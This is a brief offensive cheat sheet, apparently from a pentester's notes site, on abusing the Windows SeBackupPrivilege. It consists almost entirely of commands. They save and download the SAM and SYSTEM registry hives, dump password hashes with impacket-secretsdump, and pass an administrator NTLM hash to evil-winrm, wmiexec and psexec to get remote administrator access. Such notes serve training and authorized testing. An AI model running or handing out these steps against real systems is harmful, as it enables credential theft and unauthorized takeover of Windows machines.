SeBackupPrivilege

📆 Mar 1, 2022 • 💀 d4t4s3c • 📍 Windows (Privilege Escalation)
🏷️ windows-local-privilege-escalation

SeBackupPrivilege (Local Privilege Escalation)

Detect

*Evil-WinRM* PS C:\> whoami /priv                                                                                          

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeBackupPrivilege             Back up files and directories       Enabled

Abuse

SAM/SYSTEM

reg save HKLM\SAM sam
reg save HKLM\SYSTEM system
download sam
download system

Hash Dump

impacket-secretsdump -system system -sam sam LOCAL

PassTheHash (PtH)

WINRM

evil-winrm -i 192.168.1.58 -u 'administrator' -H '41186fb28e283ff758bb3dbeb6fb4a5c'

SMB

wmiexec

impacket-wmiexec WORKGROUP/administrator@192.168.1.58 -hashes ':41186fb28e283ff758bb3dbeb6fb4a5c'

psexec

impacket-psexec -hashes ':41186fb28e283ff758bb3dbeb6fb4a5c' WORKGROUP/administrator@192.168.1.58 cmd.exe